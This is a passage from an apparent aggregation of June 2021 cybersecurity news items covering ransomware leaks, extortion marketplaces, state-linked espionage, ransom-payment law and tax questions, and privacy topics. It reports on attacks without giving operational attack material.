Andrew Hildick-Smith is a consultant who served more than 15 years managing remote access systems for the Massachusetts Water Resources Authority. He said the percentage of companies that reported already having inventoried all of their IT systems is roughly equal to the number of larger water utilities (greater than 50,000 population) that recently had to certify to the Environmental Protection Agency (EPA) that they are compliant with the Water Infrastructure Act of 2018.

The water act gives utilities serving between 3,300 and 50,000 residents until the end of this month to complete a cybersecurity risk and resiliency assessment.

But Hildick-Smith said the vast majority of the nation’s water utilities — tens of thousands of them — serve fewer than 3,300 residents, and those utilities currently do not have to report to the EPA about their cybersecurity practices (or the lack thereof).

“A large number of utilities — probably close to 40,000 of them — are small enough that they haven’t been asked to do anything,” he said. “But some of those utilities are kind of doing cybersecurity based on self motivation rather than any requirement.”

According to the WaterISAC, a great many of the nation’s water utilities are subject to economic disadvantages typical of rural and urban communities.

“Others do not have access to a cybersecurity workforce,” the report explains. “Operating in the background is that these utilities are struggling to maintain and replace infrastructure, maintain revenues while addressing issues of affordability, and comply with safe and clean water regulations.”

The report makes the case for federal funding of state and local systems to provide cybersecurity training, tools and services for those in charge of maintaining IT systems, noting that 38 percent of water systems allocate less than 1 percent of their annual budgets to cybersecurity.

As the recent hacking incidents above can attest, enabling some form of multi-factor authentication for remote access can blunt many of these attacks.

However, the sharing of remote access credentials among water sector employees may be a contributing factor in these recent incidents, since organizations that let multiple employees use the same account also are less likely to have any form of multi-factor enabled.

A copy of the Water ISAC report is available here (PDF).

How Cyber Safe is Your Drinking Water Supply?

ADATA suffers 700 GB data leak in Ragnar Locker ransomware attack

Mon, 21 Jun 2021 21:09:29 +0000

ADATA suffers 700 GB data leak in Ragnar Locker ransomware attack

The Ragnar Locker ransomware gang have published download links for more than 700GB of archived data stolen from Taiwanese memory and storage chip maker ADATA.

A set of 13 archives, allegedly containing sensitive ADATA files, have been publicly available at a cloud-based storage service, at least for some time.

Large ADATA file archives

On Saturday, the ransomware actor published on their leak site the download links to a new set of ADATA corporate documents, warning interested parties that the links would not survive for long.

Ragnar Locker’s premonition proved true as MEGA storage service, where the gang chose to host the illegally obtained data, reacted and closed the threat actor’s account, denying access to any files they had shared publicly.

Two of the leaked archives are quite large, weighing over 100GB, but several of them that could have been easily downloaded are less than 1.1GB large.

Per the file metadata published by the threat actor, the largest archive is close to 300GB and its name gives no clue about what it might contain. Another large one is 117GB in size and its name is just as nondescript as in the case of the first one (Archive#2).

Judging by the names of the archives, Ragnar Locker likely stole from ADATA documents containing financial information, non-disclosure agreements, among other type of details.

The ransomware attack on ADATA happened on May 23rd, 2021, forcing them to take systems offline, the company told BleepingComputer. As the Ragnar Locker leak clearly shows, ADATA did not pay the ransom and restored the affected systems on its own.

The ransomware actor claims stealing 1.5TB of sensitive files before deploying the encryption routine, saying that they took their time in the process because of the poor network defenses.

“So then, as usual, we did offer to cooperate to fix the vulnerabilities and to restore their system and of course, avoid any publication regarding this issue, however, they didn't value much their own private information, as well as partners/clients/employees/customers information” - Ragnar Locker

The recently leaked batch of archives is the second one that Ragnar Locker ransomware publishes for ADATA. The previous one was posted earlier this month and includes four small 7-zip archives (less than 250MB together) that can still be downloaded.

ADATA suffers 700 GB data leak in Ragnar Locker ransomware attack

Data leak marketplace pressures victims by emailing competitors

Mon, 21 Jun 2021 21:07:24 +0000

Data leak marketplace pressures victims by emailing competitors

The Marketo data theft marketplace is applying maximum pressure on victims by emailing their competitors and offering sample packs of the stolen data.

Last month, BleepingComputer reported that cybercriminals started to create dedicated data-theft extortion marketplaces that exist solely to sell stolen data.

The data sold on these sites are obtained through the marketplace's own attacks, from other threat actors, or by collecting data released in other attacks, such as ransomware or website data breaches.

The stolen data is sold for as low as $100 to tens of thousands of dollars depending on the marketplace.

Under pressure

One of these marketplaces, known as Marketo, is now taking it a step further and emailing the victim's competitors to offer samples of the stolen data and entice them into purchasing it.

In April, Marketo claimed to have breached a large, heavy machinery and defense technology company and began selling their stolen data.

After we assume they could not find any buyers, Marketo started emailing the communication managers for the victim's competitors to offer a "demo pack" of the stolen data.

"Hello, we are Marketo and we know you have a competitor - [redacted]. So we would like to inform you that we attacked them and downloaded quite a bit of data," read the email shared with BleepingComputer.

"We have confidential and personal data, info about their tax payments, clients and partners. That might significantly lower the NASDAQ price."

Email sent to victim's competitors

It is not clear if Marketo were hoping competitors would purchase the data to learn corporate secrets or to pay to damage the reputation of their competitors.

The list of competitors that received this email includes multi-national billion-dollar companies whose names would be immediately recognizable to everyone.

Targeting victims' competitors to pressure a ransom payment or even encourage other companies to purchase stolen data is not new.

After the Clop ransomware gang went on a hacking spree targeting Accellion FTA secure file transfer devices to steal their hosted data, they also performed a similar tactic as Marketo.

After not receiving ransom payments from various victims, Clop began emailing competitors and journalists with information about the attacks to pressure the victim.

For one of these victims, Clop also emailed the company's customers and told them that their "phone, email, address, credit card information and social security number" would soon be leaked unless they "Call or write to this store and ask to protect your privacy!!!!"

Data leak marketplace pressures victims by emailing competitors

NATO's Cloud Platform has been Hacked

Mon, 21 Jun 2021 17:38:02 +0000

NATO's Cloud Platform has been Hacked

OA & IdM platform has been breached after Everis hack

NATO uses the SOA & IdM platform and classified it as secret while it was used to handle several essential functions within the Polaris program.

Part of NATO's IT modernization program, Polaris employs the SOA & IdM platform and was created to provide centralized security, integration, and hosting information management. As it handles several critical functions, the platform was classified as secret by the military alliance.

The hackers claim that they managed to make copies of the data on this platform using a backdoor and that they tried to blackmail Everis. They went further and made jokes about sending the stolen data to the Russian intelligence services.

Hackers wanted to slow down Polaris development

Paul Howland, Polaris Program Officer explained the benefits of the program: “This project has the potential to be a game-changer in how NATO will develop and deploy its operational services in the future. It will drive innovation and reduce costs. Operational by ensuring a much greater reuse of deployed capacities".

The hackers behind the attack said they were initially unaware that they could exploit a vulnerability on the NATO platform. Moreover, they focused only on Everis' corporate data in Latin America, as NATO said it was prepared to take action in the event of a cyber threat. To their surprise, one of the secure NATO platforms were among the subsidiaries of Everis.

The hackers began to steal more data from Everis networks after they analyzed the company and found documents related to drones and military defense systems. They justified the activity of slowing down the development of the Polaris program by saying that they were not "for peace on earth and in the cyber world”.

The hackers demanded from Everis a ransom of XMR 14,500 so that they would not associate its identity to the LATAM Airlines data hack. They have also asked for this ransom in exchange for not disclosing any data from NATO.

Source

Inside a ransomware attack: How dark webs of cybercriminals collaborate to pull one off

Mon, 21 Jun 2021 13:55:34 +0000

Inside a ransomware attack: How dark webs of cybercriminals collaborate to pull one off

In their Carbis Bay communique, the G7 announced their intention to work together to tackle ransomware groups. Days later, U.S. president Joe Biden met with Russian president Vladimir Putin, where an extradition process to bring Russian cybercriminals to justice in the U.S. was discussed. Putin reportedly agreed in principle, but insisted that extradition be reciprocal. Time will tell if an extradition treaty can be reached. But if it is, who exactly should extradited—and what for?

The problem for law enforcement is that ransomware—a form of malware used to steal organizations' data and hold it to ransom—is a very slippery fish. Not only is it a blended crime, including different offenses across different bodies of law, but it's also a crime that straddles the remit of different policing agencies and, in many cases, countries. And there is no one key offender. Ransomware attacks involve a distributed network of different cybercriminals, often unknown to each other to reduce the risk of arrest.

So it's important to look at these attacks in detail to understand how the U.S. and the G7 might go about tackling the increasing number of ransomware attacks we've seen during the pandemic, with at least 128 publicly disclosed incidents taking place globally in May 2021.

What we find when we connect the dots is a professional industry far removed from the organized crime playbook, which seemingly takes its inspiration straight from the pages of a business studies manual.

The ransomware industry is responsible for a huge amount of disruption in today's world. Not only do these attacks have a crippling economic effect, costing billions of dollars in damage, but the stolen data acquired by attackers can continue to cascade down through the crime chain and fuel other cybercrimes.

Ransomware attacks are also changing. The criminal industry's business model has shifted towards providing ransomware as a service. This means operators provide the malicious software, manage the extortion and payment systems and manage the reputation of the "brand". But to reduce their exposure to the risk of arrest, they recruit affiliates on generous commissions to use their software to launch attacks.

This has resulted in an extensive distribution of criminal labor, where the people who own the malware are not necessarily the same as those who plan or execute ransomware attacks. To complicate things further, both are assisted in committing their crimes by services offered by the wider cybercrime ecosystem.

How do ransomware attacks work?

There are several stages to a ransomware attack, which I have teased out after analyzing over 4,000 attacks from between 2012 and 2021.

First, there's the reconnaissance, where criminals identify potential victims and access points to their networks. This is followed by a hacker gaining "initial access", using log-in credentials bought on the dark web or obtained through deception.

Once initial access is gained, attackers seek to escalate their access privileges, allowing them to search for key organizational data that will cause the victim the most pain when stolen and held to ransom. This is why hospital medical records and police records are often the target of ransomware attacks. This key data is then extracted and saved by criminals—all before any ransomware is installed and activated.

Next comes the victim organization's first sign that they've been attacked: the ransomware is deployed, locking organizations from their key data. The victim is quickly named and shamed via the ransomware gang's leak website, located on the dark web. That "press release" may also feature threats to share stolen sensitive data, with the aim of frightening the victim into paying the ransom demand.

Successful ransomware attacks see the ransom paid in cryptocurrency, which is difficult to trace, and converted and laundered into fiat currency. Cybercriminals often invest the proceeds to enhance their capabilities—and to pay affiliates—so they don't get caught.

The cybercrime ecosystem

While it's feasible that a suitably skilled offender could perform each of the functions, it's highly unlikely. To reduce the risk of being caught, offender groups tend to develop and master specialist skills for different stages of an attack. These groups benefit from this inter-dependency, as it offsets criminal liability at each stage.

And there are plenty of specializations in the cybercrime underworld. There are spammers, who hire out spamware-as-a-service software that phishers, scammers, and fraudsters use to steal people's credentials, and databrokers who trade these stolen details on the dark web.

They might be purchased by "initial access brokers", who specialize in gaining initial entry to computer systems before selling on those access details to would-be ransomware attackers. These attackers often engage with crimeware-as-a-service brokers, who hire out ransomware-as-a-service software as well as other malicious malware.

To coordinate these groups, darkmarketeers provide online markets where criminals can openly sell or trade services, usually via the Tor network on the dark web. Monetisers are there to launder cryptocurrency and turn it into fiat currency, while negotiators, representing both victim and offender, are hired to settle the ransom amount.

This ecosystem is constantly evolving. For example, a recent development has been the emergence of the "ransomware consultant", who collects a fee for advising offenders at key stages of an attack.

Arresting offenders

Governments and law enforcement agencies appear to be ramping up their efforts to tackle ransomware offenders, following a year blighted by their continued attacks. As the G7 met in Cornwall in June 2021, Ukrainian and South Korean police forces coordinated to arrest elements of the infamous CL0P ransomware gang. In the same week, Russian national Oleg Koshkin was convicted by a U.S. court for running a malware encryption service that criminal groups use to perform cyberattacks without being detected by antivirus solutions.

While these developments are promising, ransomware attacks are a complex crime involving a distributed network of offenders. As the offenders have honed their methods, law enforcers and cybersecurity experts have tried to keep pace. But the relative inflexibility of policing arrangements, and the lack of a key offender (Mr or Mrs Big) to arrest, may always keep them one step behind the cybercriminals—even if an extradition treaty is struck between the U.S. and Russia.

Source

Google force installs Massachusetts MassNotify app on Android phones

Sat, 19 Jun 2021 22:49:37 +0000

Google force installs Massachusetts MassNotify app on Android phones

Google is force-installing a Massachusetts COVID-19 tracking app on residents' Android devices without an easy way to uninstall it.

For the past few days, users have reported that Google silently installed the Massachusetts 'MassNotify' app on their devices without the ability to open it or find it in the Google Play Store.

"This installed silently on my daughter's phone without consent or notification. She cannot have installed it herself since we use Family Link and we have to approve all app installs. I have no idea how they pulled this off, but it had to involve either Google, or Samsung, or both," a user wrote in a review on the Google Play Store.

"Normal apps can't just install themselves. I'm not sure what's going on here, but this doesn't count as "voluntary". We need information, and we need it now, folks."

MassNotify is Massachusetts' COVID-19 contact tracing app that allows users who have opted into Android's 'COVID-19 Exposure Notifications' feature to be warned when exposed to the virus.

When opting into this feature, users can select the country and state they want to receive notifications from, and the corresponding states app will be installed on the device

Opting in to the MassNotify app

However, Android users state that they have received the application even though they have not turned on the Android Exposure Notification settings on their device.

A YCombinator's Hacker News reader contacted the MassNotify Help Desk and was told that the appearance of the MassNotify app in their app list means that it is installed but not necessarily active.

"The appearance of MassNotify in the app list does not mean that MassNotify is enabled on your phone. The presence of the app merely means that MassNotify has been made available as an option in your phone's settings if you wish to enable it. For more information about this, please see this help center article from Google: https://support.google.com/android/answer/10775533

You can see whether MassNotify is active by going to Settings -> Google -> COVID-19 Exposure Notifications. The “Use Exposure Notifications” toggle at the top of the page will show you whether MassNotify is active or not. From this screen, you can also enable or disable MassNotify at any time."

Many people, though, are reporting that they cannot find any icons for the app, and it is not found when searching for 'MassNotify' in the Google Play Store, and thus cannot uninstall the force-installed app.

MassNotify not found in the Google Play Store

Instead, users have to go to the MassNotify Google Play Store URL that uses the app's internal name of 'Exposure Notifications Settings Feature - MA' and uninstall it from there.

Uninstalling the MassNotify app

BleepingComputer has contacted Google to find out why the app was installed but has not heard back at this time.

Google force installs Massachusetts MassNotify app on Android phones

Tinder spam campaign hides "handwritten" links in profile images

Sat, 19 Jun 2021 22:47:06 +0000

Tinder spam campaign hides "handwritten" links in profile images

A new trend has emerged on dating apps like Tinder with spammers sneaking in links within profile images.

Multiple such Tinder spam profiles reviewed by BleepingComputer shared some common characteristics.

For example, nearly every profile had an image of an attractive person followed by another one showing an NSFW domain handwritten on a placard.

Spammers abuse profile images to promote spam domains

In a recent trend observed by BleepingComputer, a noticeable number of fake dating profiles have flooded Tinder.

These serve no purpose other than luring users in to visit spam links—leading to third-party dating or NSFW websites.

However, unlike with other dating apps, where spammers send unsolicited links to users via direct text messages, this slightly more clever technique abuses profile pictures to sneak in images of handwritten domains within them.

These fake Tinder profiles, seen by BleepingComputer, comprised mainly two profile pictures.

The primary profile picture is often that of an attractive person, followed by a second image with the spam domain inscribed on a placard or piece of paper, as shown below:

Fake Tinder profile with an image of a real person (redacted) followed by another one with a spam placard
Source: BleepingComputer

Moreover, a provocative bio text is yet another hook to lure the user into visiting the NSFW links.

What makes this trend going is that such custom-made images containing handwritten versions of links would be much harder to automatically detect or remove en masse.

Searching profiles for text strings representing malicious domains (e.g. in user's bio) automatically is a far easier job for any AI.

Dating apps continue to battle growing spam

Although Tinder might be a victim of this new trend, popular dating apps continue to battle the problem of growing spam and fake profiles.

For example, in the past few weeks, Grindr users have been receiving unsolicited links via direct messages from "blank" profiles that typically have no bio or a profile picture:

Spammers sending unsolicited links in direct messages on Grindr
Source: BleepingComputer

Other than being an obvious nuisance, such practices by malicious actors, and the very presence of fake profiles on online dating apps, pose serious risks to the safety and privacy of legitimate users.

In Grindr's case, however, because spam messages are often strings, it would likely be much easier for the company to sweep for and remove such text messages automatically.

In March this year, the company had said:

"Grindr is fighting and banning spam non-stop, 24/7, 365 days a year. Spam is our most reported and banned category."

"The fight against spammers, particularly on an instantaneous chat service where users seek significant privacy, is a big challenge," said Alice Hunsberger, Grindr's Senior Director of Customer Experience.

Using automation, Grinder states that it strives to detect and remove spam proactively, eliminating the need for the user to manually report it—although spammers have often remained a step ahead.

"We use a number of systems in the fight, including a new AI-powered service that helps us detect 'non-human' usage of Grindr."

"Though we are constantly surprised how often we find users with the amazing ability to behave like a machine," further explained Hunsberger.

Users on dating apps should refrain from visiting dubious links and ideally report spam profiles to keep online dating communities safe for everyone.

BleepingComputer reached out to Tinder and Grindr for comment well before publishing this article but we have not heard back.

Tinder spam campaign hides "handwritten" links in profile images

Cyber espionage by Chinese hackers in neighbouring nations is on the rise

Sat, 19 Jun 2021 13:07:21 +0000

Cyber espionage by Chinese hackers in neighbouring nations is on the rise

A string of cyber espionage campaigns dating all the way back to 2014 and focused on gathering military intelligence from neighbouring countries have been linked to a Chinese military-intelligence apparatus.

In a wide-ranging report published by Massachusetts-headquartered Recorded Future this week, the cybersecurity firm's Insikt Group said it identified ties between a group it tracks as "RedFoxtrot" to the People's Liberation Army (PLA) Unit 69010 operating out of Ürümqi, the capital of the Xinjiang Uyghur Autonomous Region in the country.

Previously called the Lanzhou Military Region's Second Technical Reconnaissance Bureau, Unit 69010 is a military cover for a Technical Reconnaissance Bureau (TRB) within China's Strategic Support Force (SSF) Network Systems Department (NSD).

The connection to PLA Unit 69010 stems from what the researchers said were "lax operational security measures" adopted by an unnamed suspected RedFoxtrot threat actor, whose online persona disclosed the physical address of the reconnaissance bureau and has had a history of affiliating with the PLA's former Communications Command Academy in Wuhan.

RedFoxtrot is noted to target government, defense, and telecommunications sectors across Central Asia, India, and Pakistan, with intrusions in the last six months directed against three Indian aerospace and defense contractors as well as major telecommunications providers and government agencies in Afghanistan, India, Kazakhstan, and Pakistan.

"Activity over this period showed a particular focus on Indian targets, which occurred at a time of heightened border tensions between India and the People's Republic of China," the researchers said.

Attacks staged by the adversary involved an assortment of open- and closed-source tools that have been shared across Chinese cyberespionage groups, including PlugX, Royal Road RTF weaponizer, QUICKHEAL, PCShare, IceFog, and Poison Ivy RAT.

Also observed is the use of AXIOMATICASYMPTOTE infrastructure, which encompasses a modular Windows backdoor called ShadowPad that has been previously attributed to APT41 and subsequently shared between other Chinese state-backed actors.

Furthermore, domains registered by RedFoxtrot — "inbsnl.ddns[.]info" and "adtl.mywire[.]org" — suggest that the threat actor may have set its sights on Indian telecom service provider Bharat Sanchar Nigam Limited (BSNL) and a Bengaluru-based company called Alpha Design Technologies Limited (ADTL) that specializes in research and development of missile, radar, and satellite systems.

The development comes more than three months after another China-linked threat group, dubbed RedEcho, was uncovered targeting India's power grid, including a power plant run by National Thermal Power Corporation (NTPC) Limited and New Delhi-based Power System Operation Corporation Limited.

Source

Hit by a ransomware attack? Your payment may be deductible

Sat, 19 Jun 2021 13:00:48 +0000

Hit by a ransomware attack? Your payment may be deductible

As ransomware attacks surge, the FBI is doubling down on its guidance to affected businesses: Don't pay the cybercriminals. But the U.S. government also offers a little-noticed incentive for those who do pay: The ransoms may be tax deductible.

The IRS offers no formal guidance on ransomware payments, but multiple tax experts interviewed by The Associated Press said deductions are usually allowed under law and established guidance. It's a "silver lining" to ransomware victims, as some tax lawyers and accountants put it.

But those looking to discourage payments are less sanguine. They fear the deduction is a potentially problematic incentive that could entice businesses to pay ransoms against the advice of law enforcement. At a minimum, they say, the deductibility sends a discordant message to businesses under duress.

"It seems a little incongruous to me," said Rep. John Katko, the top Republican on the House Committee on Homeland Security.

Deductibility is a piece of a bigger quandary stemming from the rise in ransomware attacks, in which cybercriminals scramble computer data and demand payment for unlocking the files. The government doesn't want payments that fund criminal gangs and could encourage more attacks. But failing to pay can have devastating consequences for businesses and potentially for the economy overall.

A ransomware attack on Colonial Pipeline last month led to gas shortages in parts of the United States. The company, which transports about 45% of fuel consumed on the East Coast, paid a ransom of 75 bitcoin—then valued at roughly $4.4 million. An attack on JBS SA, the world's largest meat processing company, threatened to disrupt food supplies. The company said it had paid the equivalent of $11 million to hackers who broke into its computer system.

Ransomware has become a multibillion-dollar business, and the average payment was more than $310,000 last year, up 171% from 2019, according to Palo Alto Networks.

The companies that pay ransomware demands directly are well within their rights to claim a deduction, tax experts said. To be tax deductible, businesses expenses should be considered ordinary and necessary. Companies have long been able to deduct losses from more traditional crimes, such as robbery or embezzlement, and experts say ransomware payments are usually valid, too.

"I would counsel a client to take a deduction for it," says Scott Harty, a corporate tax attorney with Alston & Bird. "It fits the definition of an ordinary and necessary expense."

Don Williamson, a tax professor at the Kogod School of Business at American University, wrote a paper about the tax consequences of ransomware payments in 2017. Since then, he said, the rise of ransomware attacks has only strengthened the case for the IRS to allow ransomware payments as tax deductions.

"It's becoming more common, so therefore it becomes more ordinary," he said.

That's all the more reason, critics say, to disallow ransomware payments as tax deductions.

"The cheaper we make it to pay that ransom, then the more incentives we're creating for companies to pay, and the more incentives we're creating for companies to pay, the more incentive we're creating for criminals to continue," said Josephine Wolff, a cybersecurity policy professor at the Fletcher School of Tufts University.

For years, ransomware was more of an economic nuisance than a major national threat. But attacks launched by foreign cybergangs out of reach of U.S. law enforcement have proliferated in scale over the past year and thrust the problem of ransomware onto the front pages.

In response, top U.S. law enforcement officials have urged companies not to meet ransomware demands.

"It is our policy, it is our guidance, from the FBI, that companies should not pay the ransom for a number of reasons," FBI Director Christopher Wray testified this month before Congress. That message was echoed at another hearing this week by Eric Goldstein, a top official at the Department of Homeland Security's Cybersecurity & Infrastructure Security Agency.

Officials warn that payments lead to more ransomware attacks. "We're in this boat we're in now because over the last several years people have paid the ransom," Stephen Nix, assistant to the special agent in charge at the U.S. Secret Service, said at a recent summit on cybersecurity.

It's unclear how many companies that pay ransomware payments avail themselves of the tax deductions. When asked at a congressional hearing whether the company would pursue a tax deduction for the payment, Colonial CEO Joseph Blount said he was unaware that was a possibility.

"Great question. I had no idea about that. Not aware of that at all," he said.

There are limits to the deduction. If the loss to the company is covered by cyber insurance—something that also is becoming more common—the company can't take a deduction for the payment that's made by the insurer.

The number of active cyber insurance policies jumped from 2.2 million to 3.6 million from 2016 to 2019, a 60% increase, according to a new report from the Government Accountability Office, Congress' auditing arm. Linked to that was a 50% increase in insurance premiums paid, from $2.1 billion to $3.1 billion.

The Biden administration has pledged to make curbing ransomware a priority in the wake of a series of high-profile intrusions and said it is reviewing the U.S. government's policies related to ransomware. It has not provided any detail about what changes, if any, it may make related to the tax deductibility of ransomware.

"The IRS is aware of this and looking into it," said IRS spokesperson Robyn Walker.

Source

State Legislatures Consider Bans on Ransomware Payments

Sat, 19 Jun 2021 12:40:43 +0000

State Legislatures Consider Bans on Ransomware Payments

As ransomware attacks continue to dominate the news cycle, legislation has recently been introduced in several states that would place limits on certain entities’ ability to pay a ransom payment in the event of a ransomware attack. Although the proposed limits would generally apply to state agencies and other local governmental authorities, certain state proposals may also apply to state agencies’ IT service providers, entities that receive public funds, and/or business entities more broadly. The following summary provides an overview of five pending bills in New York, North Carolina, Pennsylvania, and Texas.

New York

NY S 6806 would broadly prohibit business entities and healthcare entities, in addition to governmental entities within the state, from paying a ransom in the event of a ransomware attack. The proposed legislation would also create a new notification requirement for governmental entities, which would be required to report any cyber incidents, as defined in the law, and to report ransomware attacks to the New York State Division of Homeland Security and Emergency Services. “Business entity” is defined as any legal entity that conducts business in the state of New York, and “health care entity” is defined as any health care facility that is regulated by the New York Department of Health.

Another pending proposal in New York, NY S 6154, would create a Cyber Security Enhancement Fund to be used for the purpose of upgrading cybersecurity in local governments throughout New York state, including but not limited to cities with a population of one million or less. The legislation would also prohibit the use of local and state taxpayer funds to pay ransoms in response to ransomware attacks, beginning on January 1, 2024.

North Carolina

NC H 813 would prohibit state agencies and local government entities from paying a ransom payment or otherwise communicating with an entity that has engaged in a ransomware incident. Local government entities would also be required to consult the state Department of Information Technology if they receive a ransom demand.

Pennsylvania

PA S 726 would prohibit the use of state and local taxpayer money or other public money to pay a ransom payment. The one exception to this ban would be if the governor of Pennsylvania has declared a disaster emergency and authorizes a state agency to pay a ransom payment in connection with the emergency. Notably, in addition to creating a new notification requirement for state agencies, the bill would also require IT managed service providers of state agencies to notify the relevant agencies within one hour of discovery of a ransomware incident.

Texas

In addition to enhancing broad cybersecurity and emergency preparedness measures for state agencies, TX 3892 would prohibit local government entities or “political subdivisions” from making ransom payments related to a ransomware attack. The law would also require political subdivisions to report ransomware attacks to both the attorney general and the Department of Information Resources.

Source

North Korea Exploited VPN Flaw to Hack South's Nuclear Research Institute

Sat, 19 Jun 2021 12:37:07 +0000

North Korea Exploited VPN Flaw to Hack South's Nuclear Research Institute

South Korea's state-run Korea Atomic Energy Research Institute (KAERI) on Friday disclosed that its internal network was infiltrated by suspected attackers operating out of its northern counterpart.

The intrusion is said to have taken place on May 14 through a vulnerability in an unnamed virtual private network (VPN) vendor and involved a total of 13 IP addresses, one of which — "27.102.114[.]89" — has been previously linked to a state-sponsored threat actor dubbed Kimsuky.

KAERI, established in 1959 and situated in the city of Daejeon, is a government-funded research institute that designs and develops nuclear technologies related to reactors, fuel rods, radiation fusion, and nuclear safety.

Following the intrusion, the think tank said it took steps to block the attacker's IP addresses in question and applied necessary security patches to the vulnerable VPN solution. "Currently, the Atomic Energy Research Institute is investigating the subject of the hacking and the amount of damage," the entity said in a statement.

The development comes following a report from SISA Journal, which disclosed the breach, alleging that the agency was attempting to cover up the hack by denying such an incident took place. KAERI attributed it to a "mistake in the response of the working-level staff."

Active since 2012, Kimsuky (aka Velvet Chollima, Black Banshee, or Thallium) is a North Korean threat actor known for its cyberespionage campaigns targeting think tanks and nuclear power operators in South Korea.

Earlier this month, cybersecurity firm Malwarebytes disclosed a wave of attacks undertaken by the adversary to strike high-profile government officials in the country by installing an Android and Windows backdoor called AppleSeed for amassing valuable information.

The targeted entities involved the Ministry of Foreign Affairs, Ambassador of the Embassy of Sri Lanka to the State, International Atomic Energy Agency (IAEA) Nuclear Security Officer, and the Deputy Consul General at Korean Consulate General in Hong Kong, with the aforementioned IP address used for command-and-control (C2) communications.

It is not immediately clear what VPN vulnerability was exploited to breach the network. But it's worth noting that unpatched VPN systems from Pulse Secure, SonicWall, Fortinet FortiOS, and Citrix have been subjected to attacks by multiple threat actors in recent years.

Source

Apple and Google’s AI wizardry promises privacy—at a cost

Fri, 18 Jun 2021 22:09:41 +0000

Apple and Google’s AI wizardry promises privacy—at a cost

Upgraded data protection and less reliance on the cloud could lock users in.

Since the dawn of the iPhone, many of the smarts in smartphones have come from elsewhere: the corporate computers known as the cloud. Mobile apps sent user data cloudward for useful tasks like transcribing speech or suggesting message replies. Now Apple and Google say smartphones are smart enough to do some crucial and sensitive machine-learning tasks like those on their own.

At Apple's WWDC event this month, the company said its virtual assistant Siri will transcribe speech without tapping the cloud in some languages on recent and future iPhones and iPads. During its own I/O developer event last month, Google said the latest version of its Android operating system has a feature dedicated to secure, on-device processing of sensitive data, called the Private Compute Core. Its initial uses include powering the version of the company's Smart Reply feature built into its mobile keyboard that can suggest responses to incoming messages.

Apple and Google both say on-device machine learning offers more privacy and snappier apps. Not transmitting personal data cuts the risk of exposure and saves time spent waiting for data to traverse the internet. At the same time, keeping data on devices aligns with the tech giants' long-term interest in keeping consumers bound into their ecosystems. People that hear their data can be processed more privately might become more willing to agree to share more data.

The companies' recent promotion of on-device machine learning comes after years of work on technology to constrain the data their clouds can "see."

In 2014, Google started gathering some data on Chrome browser usage through a technique called differential privacy, which adds noise to harvested data in ways that restrict what those samples reveal about individuals. Apple has used the technique on data gathered from phones to inform emoji and typing predictions and for web browsing data.

More recently, both companies have adopted a technology called federated learning. It allows a cloud-based machine-learning system to be updated without scooping in raw data; instead, individual devices process data locally and share only digested updates. As with differential privacy, the companies have discussed using federated learning only in limited cases. Google has used the technique to keep its mobile typing predictions up to date with language trends; Apple has published research on using it to update speech-recognition models.

Rachel Cummings, an assistant professor at Columbia who has previously consulted on privacy for Apple, says the rapid shift to do some machine learning on phones has been striking. "It's incredibly rare to see something going from the first conception to being deployed at scale in so few years," she says.

That progress has required not just advances in computer science but for companies to take on the practical challenges of processing data on devices owned by consumers. Google has said that its federated learning system only taps users' devices when they are plugged in, idle, and on a free Internet connection. The technique was enabled in part by improvements in the power of mobile processors.

Beefier mobile hardware also contributed to Google's 2019 announcement that voice recognition for its virtual assistant on Pixel devices would be wholly on-device, free from the crutch of the cloud. Apple's new on-device voice recognition for Siri, announced at WWDC this month, will use the "neural engine" the company added to its mobile processors to power up machine-learning algorithms.

The technical feats are impressive. It's debatable how much they will meaningfully change users' relationship with tech giants.

Presenters at Apple's WWDC said Siri's new design was a "major update to privacy" that addressed the risk associated with accidentally transmitting audio to the cloud, saying that was users' largest privacy concern about voice assistants. Some Siri commands—such as setting timers—can be recognized wholly locally, making for a speedy response. Yet in many cases transcribed commands to Siri—presumably including from accidental recordings—will be sent to Apple servers for software to decode and respond. Siri voice transcription will still be cloud-based for HomePod smart speakers commonly installed in bedrooms and kitchens, where accidental recording can be more concerning.

Google also promotes on-device data processing as a privacy win and has signaled it will expand the practice. The company expects partners such as Samsung that use its Android operating system to adopt the new Privacy Compute Core and use it for features that rely on sensitive data.

Google has also made local analysis of browsing data a feature of its proposal for reinventing online ad targeting, dubbed FLoC and claimed to be more private. Academics and some rival tech companies have said the design is likely to help Google consolidate its dominance of online ads by making targeting more difficult for other companies.

Michael Veale, a lecturer in digital rights at University College London, says on-device data processing can be a good thing but adds that the way tech companies promote it shows they are primarily motivated by a desire to keep people tied into lucrative digital ecosystems.

"Privacy gets confused with keeping data confidential, but it's also about limiting power," says Veale. "If you're a big tech company and manage to reframe privacy as only confidentiality of data, that allows you to continue business as normal and gives you license to operate."

A Google spokesperson said the company "builds for privacy everywhere computing happens" and that data sent to the Private Compute Core for processing "needs to be tied to user value." Apple did not respond to a request for comment.

Cummings of Columbia says new privacy techniques and the way companies market them add complexity to the trade-offs of digital life. Over recent years, as machine learning has become more widely deployed, tech companies have steadily expanded the range of data they collect and analyze. There is evidence some consumers misunderstand the privacy protections trumpeted by tech giants.

A forthcoming survey study from Cummings and collaborators at Boston University and the Max Planck Institute showed descriptions of differential privacy drawn from tech companies, media, and academics to 675 Americans. Hearing about the technique made people about twice as likely to report they would be willing to share data. But there was evidence that descriptions of differential privacy's benefits also encouraged unrealistic expectations. One-fifth of respondents expected their data to be protected against law enforcement searches, something differential privacy does not do. Apple's and Google's latest proclamations about on-device data processing may bring new opportunities for misunderstandings.

This story originally appeared on wired.com.

Apple and Google’s AI wizardry promises privacy—at a cost

First American Financial Pays Farcical $500K Fine

Fri, 18 Jun 2021 21:56:08 +0000

First American Financial Pays Farcical $500K Fine

In May 2019, KrebsOnSecurity broke the news that the website of mortgage settlement giant First American Financial Corp. [NYSE:FAF] was leaking more than 800 million documents — many containing sensitive financial data — related to real estate transactions dating back 16 years. This week, the U.S. Securities and Exchange Commission settled its investigation into the matter after the Fortune 500 company agreed to pay a paltry penalty of less than $500,000.

First American Financial Corp.

If you bought or sold a property in the last two decades or so, chances are decent that you also gave loads of personal and financial documents to First American. According to data from the American Land Title Association, First American is the second largest mortgage title and settlement company in the United States, handling nearly a quarter of all closings each year.

The SEC says First American derives nearly 92 percent of its revenue from its title insurance segment, earning $7.1 billion last year.

Title insurance protects homebuyers from the prospect of someone contesting their legitimacy as the new homeowner. According to SimpleShowing.com, there are actually two title insurance policies in each transaction — one for the buyer and one for the lender (the latter also needs protection as they’re providing the mortgage to purchase the home).

